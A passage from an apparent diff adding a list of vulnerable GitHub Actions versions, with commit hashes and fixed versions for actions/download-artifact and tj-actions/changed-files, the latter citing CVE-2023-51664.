["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - ["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", 
"4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - 
["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", 
"v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", 
"a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", 
"c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", "b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", 
"v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - 
["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", "41"] + - ["tj-actions/changed-files", "v35.5.4", "74338865c1e73fee674ce5cfc5d28f4b9caa33bc", "41"] + - ["tj-actions/changed-files", "v35.5.3", "d5414fd30b0b7618c815fe7ebe5673720e081937", "41"] + - ["tj-actions/changed-files", "v35.5.2", "7f2aa19bdcf4a00195671e368091a1e32a694ac5", "41"] + - ["tj-actions/changed-files", "v35.5.1", "210cc839c24f532fe4fbf510b7b3314ca9a2b90b", "41"] + - ["tj-actions/changed-files", "v35.5.0", "db3ea27a0cf07135175be5efe7aaf84df6e0e6f0", "41"] + - ["tj-actions/changed-files", "v35.4.4", "57d9664f8e2aa45f26bcb59095f99aa47ae8e90d", "41"] + - ["tj-actions/changed-files", "v35.4.3", "0953088baa540166372190bec608cad1603a787d", "41"] + - ["tj-actions/changed-files", "v35.4.2", "0562b9f865df79542dfcd59cfbd14c9ac9a792d3", "41"] + - ["tj-actions/changed-files", "v35.4.1", "487675b843e203b5c9a92a07f1ed763d046d7283", "41"] + - ["tj-actions/changed-files", "v35.4.0", "9a6dabf8d15381f97f1c770257a1a0db59c28a47", "41"] + - ["tj-actions/changed-files", "v35.3.2", "7839ede089e483df865be448d6f3652f875005e0", "41"] + - ["tj-actions/changed-files", "v35.3.1", "c2296c1b044b4f5c97d310a6d31e95cbcb5583ec", "41"] + - ["tj-actions/changed-files", "v35.3.0", "ea251d4d2f03a9c18841ae1b752f58b82dfb4d5e", "41"] + - ["tj-actions/changed-files", "v35.2.1", "1d1287f9fafd92be283f99b781fb5f00f00dd471", "41"] + - ["tj-actions/changed-files", "v35.2.0", "392359fc8c85be1a8752e9ab6b1ad9e45158b4a9", "41"] + - ["tj-actions/changed-files", "v35.1.2", "7f33882a1271950f8592f96b77e694436bfee83b", "41"] + - ["tj-actions/changed-files", "v35.1.1", "1d8a2f91371fd14ec6146c37cbae79526144fbe9", "41"] + - ["tj-actions/changed-files", "v35.1.0", "0626c3f94002c0a9d7491dd7fed7055bbdff6f92", "41"] + - 
["tj-actions/changed-files", "v35.0.1", "a2b1e5dbb92d21753cf198228fbf2d0a8557f117", "41"] + - ["tj-actions/changed-files", "v35.0.0", "110b9baa5fc65597d65c1d019c6d3aee16d00c53", "41"] + - ["tj-actions/changed-files", "v35", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v34.6.2", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v34.6.1", "3b6c057cd82d1dafab565df2ba9fa489574a03b8", "41"] + - ["tj-actions/changed-files", "v34.6.0", "4f64429e8be26fe81a594635b07ed829581ea847", "41"] + - ["tj-actions/changed-files", "v34.5.4", "3f1e44af6ca48144748dfc62a7a6fb22e4ca67f3", "41"] + - ["tj-actions/changed-files", "v34.5.3", "74dc2e8a7877b725678a2195226bd470f10c481b", "41"] + - ["tj-actions/changed-files", "v34.5.2", "8356a01788b5a36aa0319e74183f3237e020feac", "41"] + - ["tj-actions/changed-files", "v34.5.1", "baaf598b46c2d9eb97eb995c9f69d1967349155d", "41"] + - ["tj-actions/changed-files", "v34.5.0", "8a4cc4fbd67975557b6d85dd302f5f9400b9c92e", "41"] + - ["tj-actions/changed-files", "v34.4.4", "8a7336fb6f6bc00da867b745d3491de42ac0231b", "41"] + - ["tj-actions/changed-files", "v34.4.3", "3996bc3fded83a011dbfc57f379fd31266770b3a", "41"] + - ["tj-actions/changed-files", "v34.4.2", "ef0a29048c50f844e30fac9fef80956f9765aab8", "41"] + - ["tj-actions/changed-files", "v34.4.1", "3ebdc42d8ba53fedc5bef0f16181249ac58446fa", "41"] + - ["tj-actions/changed-files", "v34.4.0", "94e6fba8d802f0fa80db51937e8752e9c165ee26", "41"] + - ["tj-actions/changed-files", "v34.3.4", "3dbb79f46716e706df6be563a268df44b264b545", "41"] + - ["tj-actions/changed-files", "v34.3.3", "991e8b3aae0ebbe0614b15b05d14ccb92affa24a", "41"] + - ["tj-actions/changed-files", "v34.3.2", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", "v34.3.1", "72d3bb8b336df0723f5c9e9d5875c61bf7bdfe9f", "41"] + - ["tj-actions/changed-files", 
"v34.3.0", "5f89dc7d6eefdcb7323e773671fd3461a7c2f050", "41"] + - ["tj-actions/changed-files", "v34.2.2", "734bb168e38279dfc7aa2af5d5be3a1475427a99", "41"] + - ["tj-actions/changed-files", "v34.2.1", "d2e030b6ed85ce2db7ac1a4afc574640df8bca26", "41"] + - ["tj-actions/changed-files", "v34.2.0", "6ba3c59bc6825f1ad375d92a9e70c6b275db0ddd", "41"] + - ["tj-actions/changed-files", "v34.1.1", "d0e44775cd5572bb0ead1d7d2e399015644f7359", "41"] + - ["tj-actions/changed-files", "v34.1.0", "b91acef304123e58fd6671ab267d6b5e2a7f2ef3", "41"] + - ["tj-actions/changed-files", "v34.0.5", "12633630aba2ab48ec2ad8a3344dd736d61a7b89", "41"] + - ["tj-actions/changed-files", "v34.0.4", "71840771e95943b1ab0c8f8ae45aeb0a34458e2e", "41"] + - ["tj-actions/changed-files", "v34.0.3", "cbfb0fda5afcfbf4ef0ef854bf0d8210abd0866f", "41"] + - ["tj-actions/changed-files", "v34.0.2", "932dad31974f07bd23cab5870d45c6e5ad5c8b73", "41"] + - ["tj-actions/changed-files", "v34.0.1", "9f289689bb8364780830da00b69507b88b5a2f07", "41"] + - ["tj-actions/changed-files", "v34.0.0", "c4d29bf5b2769a725bcc9a723c498ba9c34c05b4", "41"] + - ["tj-actions/changed-files", "v34", "ce4b8e3cba2220de8132ac9721ff754efd6bb7d7", "41"] + - ["tj-actions/changed-files", "v33.0.0", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v33", "aa52cfcd81f1a00a6bf1241a8cad6adec4d80638", "41"] + - ["tj-actions/changed-files", "v32.1.2", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v32.1.1", "8953e851a137075e59e84b5c15fbeb3617e82f15", "41"] + - ["tj-actions/changed-files", "v32.1.0", "8de562e9316b23c4473ad852e5fd4f7f2bac7bc8", "41"] + - ["tj-actions/changed-files", "v32.0.1", "7c640bd299646362775f9d02e156bc741f67453b", "41"] + - ["tj-actions/changed-files", "v32.0.0", "270645280afddc7e2cf3f4867089522c8f2f8f9a", "41"] + - ["tj-actions/changed-files", "v32", "1d6e210c970d01a876fbc6155212d068e79ca584", "41"] + - ["tj-actions/changed-files", "v31.0.3", 
"dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v31.0.2", "528984a4f814905ea80ed2a3818afc97aef8b0de", "41"] + - ["tj-actions/changed-files", "v31.0.1", "75af1a47c484c669beec6a1d00fc9d1d78179725", "41"] + - ["tj-actions/changed-files", "v31.0.0", "5184a750a66da08aba414ca223aef75c055956a5", "41"] + - ["tj-actions/changed-files", "v31", "dd7c81416dd9ddc14c594f751cd92c661e13daee", "41"] + - ["tj-actions/changed-files", "v30.0.0", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v30", "402f3827f0f759df60b674e7f52a02d6f4a5af8b", "41"] + - ["tj-actions/changed-files", "v29.0.9", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v29.0.8", "df4dacaa89cace34cd60d5e9580f041a041e5233", "41"] + - ["tj-actions/changed-files", "v29.0.7", "602081b5d9327a7770b4c447a4ee8984ae44e72e", "41"] + - ["tj-actions/changed-files", "v29.0.6", "6e12407521ea9b0d11a4b7ab09b40266bd39496a", "41"] + - ["tj-actions/changed-files", "v29.0.5", "c5c9b6ff9e75d84d8b69cbf82bcfbf61672ef91e", "41"] + - ["tj-actions/changed-files", "v29.0.4", "c41b7152594c4423f3787d26662239eb0ae027c0", "41"] + - ["tj-actions/changed-files", "v29.0.3", "60f4aabced9b4718c75acef86d42ffb631c4403a", "41"] + - ["tj-actions/changed-files", "v29.0.2", "82edb42dc4e3a5d5edf24cc3ae4b1f55c20cc220", "41"] + - ["tj-actions/changed-files", "v29.0.1", "18edda74753bbb7090ea030c1f80ef9610ebdff1", "41"] + - ["tj-actions/changed-files", "v29.0.0", "bec82ebb3493119ba317fcee8a0d1db09d39d1ac", "41"] + - ["tj-actions/changed-files", "v29", "f7a56405a89ea095c6230f10e7f1c49daab13b35", "41"] + - ["tj-actions/changed-files", "v28.0.0", "28ac6724247a133793509b5d165d58319b40a171", "41"] + - ["tj-actions/changed-files", "v28", "602cf940579b9a2b2db0aafe835bfdb675fac12c", "41"] + - ["tj-actions/changed-files", "v27", "5e56dcabdd4a97ea745791856930038be56d9b70", "41"] + - ["tj-actions/changed-files", "v26.1", "58ae566dc69a926834e4798bcfe0436ff97c0599", 
"41"] + - ["tj-actions/changed-files", "v26", "7394701157dae4adb4eaa75d8c99e9b2edff81fe", "41"] + - ["tj-actions/changed-files", "v25", "36e65a11651994e93d6f1ef3afa781c3dcbb9780", "41"] + - ["tj-actions/changed-files", "v24.1", "bf6ddb7db66f9da5b2cffeb28b2b696aacb26e1c", "41"] + - ["tj-actions/changed-files", "v24", "6c44eb8294bb9c93d6118427f4ff8404b695e1d7", "41"] + - ["tj-actions/changed-files", "v23.2", "b2ee165d6b42ab1740e1037eb93748aad96767c5", "41"] + - ["tj-actions/changed-files", "v23.1", "34a865a2b221bd60ec0d4c071f5e7a66ffdac88a", "41"] + - ["tj-actions/changed-files", "v23", "fb1fe28aa9ff24afc553b37545437005a4cf2115", "41"] + - ["tj-actions/changed-files", "v22.2", "ae90a0b602c90d598c0c027a519493c1a069543e", "41"] + - ["tj-actions/changed-files", "v22.1", "bc1dc8f54db8eeeaae00ab92737ab34926b9ad8d", "41"] + - ["tj-actions/changed-files", "v22", "3de1f9a283b61f308ee3045be4d301037657225a", "41"] + - ["tj-actions/changed-files", "v21", "0edfedf16d9ff0903cbe599d474a022823ca8fb8", "41"] + - ["tj-actions/changed-files", "v20.2", "205450238e81d3da0e0ec2d776f58c12846fddfb", "41"] + - ["tj-actions/changed-files", "v20.1", "944a8b89098b24b0723ed9264888eb7fcffbbe9a", "41"] + - ["tj-actions/changed-files", "v20", "581eef0495dd5b75a3dd93047ff9f0d42dc09370", "41"] + - ["tj-actions/changed-files", "v19.3", "e55f7fb99e90111108bc24d3f14156b06ab6a12c", "41"] + - ["tj-actions/changed-files", "v19.2", "07b38ce1a17c46f1d0eb1150c8a33f703d473262", "41"] + - ["tj-actions/changed-files", "v19.1", "d26252004aa87df12f72411feec056907ecdbadc", "41"] + - ["tj-actions/changed-files", "v19", "a6d456f542692915c5289ea834fb89bc07c11208", "41"] + - ["tj-actions/changed-files", "v18.7", "a59f800cbb60ed483623848e31be67659a2940f8", "41"] + - ["tj-actions/changed-files", "v18.6", "a2f1692a6f703b7a14e155ae404e6bb15538b763", "41"] + - ["tj-actions/changed-files", "v18.5", "72aab29255d4fd553ccf1c0fa3223dcc62a2fd84", "41"] + - ["tj-actions/changed-files", "v18.4", 
"e35d0afdc1f0b01f84ec0f4cdf1b179325634b36", "41"] + - ["tj-actions/changed-files", "v18.3", "081ee9cc54a7ded6c421c632f23a31dbbe34a5f3", "41"] + - ["tj-actions/changed-files", "v18.2", "1f30bd2085b83668fb636f1a1f90744d8adbacca", "41"] + - ["tj-actions/changed-files", "v18.1", "227e314ad84036340cab47e649d91b012275a53c", "41"] + - ["tj-actions/changed-files", "v18", "ffd30e8dd820b89653c2298acf0447d29dbd0f16", "41"] + - ["tj-actions/changed-files", "v17.3", "f5a8de7d36c5909d300d7fcc8d6340d2a56ab9d9", "41"] + - ["tj-actions/changed-files", "v17.2", "0bc7d4006fb085334217ec5d6e6c288daade2f59", "41"] + - ["tj-actions/changed-files", "v17.1", "a53d74f700f2982646d538e66ce35cbfc8d4e826", "41"] + - ["tj-actions/changed-files", "v17", "933541631c41bad3fe20bdbd440ec68afa9a9518", "41"] + - ["tj-actions/changed-files", "v16", "4daffbaee17b34b8ae544990906277485819cc16", "41"] + - ["tj-actions/changed-files", "v15.1", "4b1f26aed507a21569666773e1c753dfe409d806", "41"] + - ["tj-actions/changed-files", "v15", "09441d38eaf8b76cbe2c42e256f46dfb432f63a4", "41"] + - ["tj-actions/changed-files", "v14.7", "e44053b6a0e8e7df1aa50a171c46601c605f61bb", "41"] + - ["tj-actions/changed-files", "v14.6", "c0dba8199070f01fcea9cd3a4dc42b365f06bf8d", "41"] + - ["tj-actions/changed-files", "v14.5", "fd2e9917c337ba7e2222d5aa9e32b27a57a71d14", "41"] + - ["tj-actions/changed-files", "v14.4", "2a8a501ad614cd775a2c07537b555783496dc085", "41"] + - ["tj-actions/changed-files", "v14.3", "a8ea7202c1c248d93235e87cc59e5b3a9881f558", "41"] + - ["tj-actions/changed-files", "v14.2", "88edda5361ed308226d6cb938eaa8b18182750f5", "41"] + - ["tj-actions/changed-files", "v14.1", "be68c10267c4979ed30c9397041b052b2980f91f", "41"] + - ["tj-actions/changed-files", "v14", "b59431bc7d44f9e8951a290fc7d48879f2ca1939", "41"] + - ["tj-actions/changed-files", "v13.2", "68bd279d40fb5bfc976429283b060c6ee426f63c", "41"] + - ["tj-actions/changed-files", "v13.1", "2c85495a7bb72f2734cb5181e29b2ee5e08e61f7", "41"] + - 
["tj-actions/changed-files", "v13", "f276697f3b86a1d897052524507c59f5e173ccd1", "41"] + - ["tj-actions/changed-files", "v12.2", "00f80efd45353091691a96565de08f4f50c685f8", "41"] + - ["tj-actions/changed-files", "v12.1", "f56e736bedd192c12951db94e83a440885d04eb1", "41"] + - ["tj-actions/changed-files", "v12", "019a09d36e5b592a6770a9a71ef1b3efd9a85d37", "41"] + - ["tj-actions/changed-files", "v11.9", "3b638a970886ec84db14ad956bb4df9766bd7c50", "41"] + - ["tj-actions/changed-files", "v11.8", "b42f932be5b3fee4a990cb3e03478d5da2d4293b", "41"] + - ["tj-actions/changed-files", "v11.7", "8dfe0ee3f4840f84a7947b5288b19d7a583755ae", "41"] + - ["tj-actions/changed-files", "v11.6", "aae164d51be780a235cdeea89752bbacbbfee3c3", "41"] + - ["tj-actions/changed-files", "v11.5", "09a879748c548705ec26508c030b11aad9b5097a", "41"] + - 